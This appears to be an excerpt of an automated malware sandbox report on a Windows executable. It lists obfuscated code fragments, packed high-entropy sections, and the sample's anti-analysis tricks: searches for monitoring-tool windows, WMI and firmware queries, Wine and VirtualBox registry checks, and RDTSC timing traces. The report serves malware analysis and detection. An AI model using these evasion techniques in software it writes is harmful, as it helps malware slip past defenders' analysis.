Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B380DD push 654530A7h; mov dword ptr [esp], eax	0_2_00B39D01
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B380DD push edx; mov dword ptr [esp], eax	0_2_00B39D05
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B380C0 push edi; mov dword ptr [esp], ebx	0_2_00B381F7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B3A02C push eax; mov dword ptr [esp], ecx	0_2_00B3A038
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B38010 push 1C24FBBDh; mov dword ptr [esp], ecx	0_2_00B3C130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B36019 push 341F845Fh; mov dword ptr [esp], esi	0_2_00B36134
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B36019 push ecx; mov dword ptr [esp], 12FB3782h	0_2_00B36138
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B3407D push edi; mov dword ptr [esp], 1EE01231h	0_2_00B34093
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B3606C push 341F845Fh; mov dword ptr [esp], esi	0_2_00B36134
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B3606C push ecx; mov dword ptr [esp], 12FB3782h	0_2_00B36138
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B38050 push 6FCE2051h; mov dword ptr [esp], esi	0_2_00B38062
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B36040 push 341F845Fh; mov dword ptr [esp], esi	0_2_00B36134
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B36040 push ecx; mov dword ptr [esp], 12FB3782h	0_2_00B36138

Source: file.exe	Static PE information: section name: entropy: 7.147151884597137
Source: file.exe	Static PE information: section name: grpnkoxr entropy: 7.954246998260437

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\file.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB15A2 second address: CB15D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B4D4AC9EBh 0x00000009 pop ebx 0x0000000a jmp 00007F2B4D4AC9F1h 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 jnc 00007F2B4D4AC9E6h 0x00000019 pop ebx 0x0000001a push ecx 0x0000001b push edx 0x0000001c pop edx 0x0000001d jc 00007F2B4D4AC9E6h 0x00000023 pop ecx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB09D4 second address: CB0A22 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2B4CC6E2A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F2B4CC6E2B3h 0x0000000f jmp 00007F2B4CC6E2B7h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F2B4CC6E2B8h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB0A22 second address: CB0A3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4D4AC9F5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB0E68 second address: CB0EB0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2B4CC6E2BBh 0x00000008 jmp 00007F2B4CC6E2AFh 0x0000000d jnp 00007F2B4CC6E2A6h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 jmp 00007F2B4CC6E2B2h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F2B4CC6E2B4h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB0EB0 second address: CB0EB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB3C18 second address: CB3C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B4CC6E2B3h 0x00000009 popad 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007F2B4CC6E2B3h 0x00000014 mov eax, dword ptr [eax] 0x00000016 pushad 0x00000017 push edx 0x00000018 push edi 0x00000019 pop edi 0x0000001a pop edx 0x0000001b pushad 0x0000001c jmp 00007F2B4CC6E2B5h 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 popad 0x00000024 popad 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 push esi 0x0000002a push eax 0x0000002b push edx 0x0000002c push edx 0x0000002d pop edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB3CD6 second address: CB3D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 push eax 0x00000007 jmp 00007F2B4D4AC9EAh 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push edx 0x00000011 jmp 00007F2B4D4AC9EEh 0x00000016 pop edx 0x00000017 mov eax, dword ptr [eax] 0x00000019 jnl 00007F2B4D4AC9ECh 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 jmp 00007F2B4D4AC9F2h 0x00000028 pop eax 0x00000029 jns 00007F2B4D4AC9ECh 0x0000002f mov ecx, dword ptr [ebp+122D3760h] 0x00000035 push 00000003h 0x00000037 mov ch, dh 0x00000039 push 00000000h 0x0000003b jnc 00007F2B4D4AC9E9h 0x00000041 mov dword ptr [ebp+122D2C83h], edx 0x00000047 push 00000003h 0x00000049 mov si, 0E0Ch 0x0000004d call 00007F2B4D4AC9E9h 0x00000052 push edi 0x00000053 pushad 0x00000054 push ecx 0x00000055 pop ecx 0x00000056 js 00007F2B4D4AC9E6h 0x0000005c popad 0x0000005d pop edi 0x0000005e push eax 0x0000005f pushad 0x00000060 jne 00007F2B4D4AC9E8h 0x00000066 jl 00007F2B4D4AC9E8h 0x0000006c pushad 0x0000006d popad 0x0000006e popad 0x0000006f mov eax, dword ptr [esp+04h] 0x00000073 push eax 0x00000074 push edx 0x00000075 je 00007F2B4D4AC9ECh 0x0000007b jl 00007F2B4D4AC9E6h 0x00000081 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB3D87 second address: CB3D8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB3D8C second address: CB3D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB3FAC second address: CB3FB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB4023 second address: CB4031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB4031 second address: CB4036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB4036 second address: CB406C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F2B4D4AC9F3h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F2B4D4AC9F5h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB406C second address: CB4101 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007F2B4CC6E2AEh 0x0000000f push 00000003h 0x00000011 pushad 0x00000012 mov dword ptr [ebp+122D189Ah], ecx 0x00000018 ja 00007F2B4CC6E2A7h 0x0000001e popad 0x0000001f pushad 0x00000020 mov dword ptr [ebp+122D2C83h], esi 0x00000026 movsx edx, dx 0x00000029 popad 0x0000002a push 00000000h 0x0000002c push 00000003h 0x0000002e mov edi, 4DB82C00h 0x00000033 call 00007F2B4CC6E2A9h 0x00000038 pushad 0x00000039 jmp 00007F2B4CC6E2B0h 0x0000003e push ebx 0x0000003f jmp 00007F2B4CC6E2B1h 0x00000044 pop ebx 0x00000045 popad 0x00000046 push eax 0x00000047 jmp 00007F2B4CC6E2ADh 0x0000004c mov eax, dword ptr [esp+04h] 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F2B4CC6E2AFh 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB4101 second address: CB4149 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4D4AC9F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F2B4D4AC9F0h 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007F2B4D4AC9F8h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD416A second address: CD4170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD4170 second address: CD417D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F2B4D4AC9E6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD417D second address: CD41A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jnp 00007F2B4CC6E2A6h 0x00000010 pop esi 0x00000011 popad 0x00000012 push ebx 0x00000013 push ebx 0x00000014 jno 00007F2B4CC6E2A6h 0x0000001a pop ebx 0x0000001b jo 00007F2B4CC6E2B2h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD28ED second address: CD28F7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2B4D4AC9E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD3044 second address: CD3048 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD32D7 second address: CD32DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD32DD second address: CD32E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jc 00007F2B4CC6E2A6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD38C6 second address: CD38DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4D4AC9EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD38DC second address: CD3901 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2B1h 0x00000007 jne 00007F2B4CC6E2A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 js 00007F2B4CC6E2A6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD3901 second address: CD3905 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD3905 second address: CD3911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F2B4CC6E2A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD3911 second address: CD3924 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jno 00007F2B4D4AC9E6h 0x0000000b je 00007F2B4D4AC9E6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD3924 second address: CD392D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD3D07 second address: CD3D22 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2B4D4AC9F5h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD7AF3 second address: CD7B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a jbe 00007F2B4CC6E2A6h 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F2B4CC6E2B3h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD8D90 second address: CD8D95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA12C8 second address: CA12CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDF376 second address: CDF385 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B4D4AC9EBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CDFC06 second address: CDFC0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE0C9A second address: CE0CA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE0CA1 second address: CE0CC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jmp 00007F2B4CC6E2B6h 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE0CC3 second address: CE0D3C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2B4D4AC9ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jng 00007F2B4D4AC9FFh 0x00000014 mov eax, dword ptr [eax] 0x00000016 je 00007F2B4D4AC9F4h 0x0000001c jmp 00007F2B4D4AC9EEh 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push edx 0x00000026 jmp 00007F2B4D4AC9EBh 0x0000002b pop edx 0x0000002c pop eax 0x0000002d jmp 00007F2B4D4AC9EFh 0x00000032 push 98A55DEBh 0x00000037 push eax 0x00000038 push edx 0x00000039 jo 00007F2B4D4AC9E8h 0x0000003f push esi 0x00000040 pop esi 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE135A second address: CE1382 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F2B4CC6E2A8h 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2B4CC6E2B4h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE1382 second address: CE138C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2B4D4AC9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE18D7 second address: CE18DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE1C2B second address: CE1C2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE1E01 second address: CE1E28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F2B4CC6E2A8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE1E28 second address: CE1E83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F2B4D4AC9E6h 0x00000009 jmp 00007F2B4D4AC9F1h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F2B4D4AC9E8h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c mov di, 2BDEh 0x00000030 xchg eax, ebx 0x00000031 push ebx 0x00000032 pushad 0x00000033 je 00007F2B4D4AC9E6h 0x00000039 push ecx 0x0000003a pop ecx 0x0000003b popad 0x0000003c pop ebx 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push edx 0x00000041 jl 00007F2B4D4AC9E6h 0x00000047 pop edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE1E83 second address: CE1E89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE24A1 second address: CE24B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F2B4D4AC9E6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE3DDD second address: CE3DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE3DE1 second address: CE3DE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE3DE5 second address: CE3DEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE3DEF second address: CE3E07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jo 00007F2B4D4AC9E6h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE3E07 second address: CE3E3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push eax 0x00000008 pop esi 0x00000009 push 00000000h 0x0000000b add si, EC0Ch 0x00000010 push 00000000h 0x00000012 mov dword ptr [ebp+122D353Ch], ecx 0x00000018 xchg eax, ebx 0x00000019 jmp 00007F2B4CC6E2B0h 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jbe 00007F2B4CC6E2ACh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE5356 second address: CE5367 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B4D4AC9EDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE5367 second address: CE536B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE536B second address: CE53B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov edi, ebx 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F2B4D4AC9E8h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 mov edi, dword ptr [ebp+122D2A83h] 0x0000002f mov esi, dword ptr [ebp+122D2A27h] 0x00000035 push 00000000h 0x00000037 mov edi, dword ptr [ebp+122D3316h] 0x0000003d xchg eax, ebx 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 jg 00007F2B4D4AC9E6h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE69E1 second address: CE69E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE69E5 second address: CE69E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE69E9 second address: CE69EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE69EF second address: CE69F4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE69F4 second address: CE6A18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 xor esi, 6AB9D46Eh 0x0000000e push 00000000h 0x00000010 sub esi, 5D4E66C1h 0x00000016 push 00000000h 0x00000018 mov edi, dword ptr [ebp+122D2CA1h] 0x0000001e push eax 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push esi 0x00000023 pop esi 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE6A18 second address: CE6A22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE6A22 second address: CE6A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE6A26 second address: CE6A2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE731C second address: CE7320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEA567 second address: CEA5EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B4D4AC9F5h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 jmp 00007F2B4D4AC9F5h 0x00000015 popad 0x00000016 nop 0x00000017 sub dword ptr [ebp+122D1A43h], ecx 0x0000001d or di, 7EE7h 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push ebp 0x00000027 call 00007F2B4D4AC9E8h 0x0000002c pop ebp 0x0000002d mov dword ptr [esp+04h], ebp 0x00000031 add dword ptr [esp+04h], 00000017h 0x00000039 inc ebp 0x0000003a push ebp 0x0000003b ret 0x0000003c pop ebp 0x0000003d ret 0x0000003e push 00000000h 0x00000040 jmp 00007F2B4D4AC9EAh 0x00000045 xchg eax, esi 0x00000046 jmp 00007F2B4D4AC9F1h 0x0000004b push eax 0x0000004c push ebx 0x0000004d push eax 0x0000004e push edx 0x0000004f push ebx 0x00000050 pop ebx 0x00000051 rdtsc
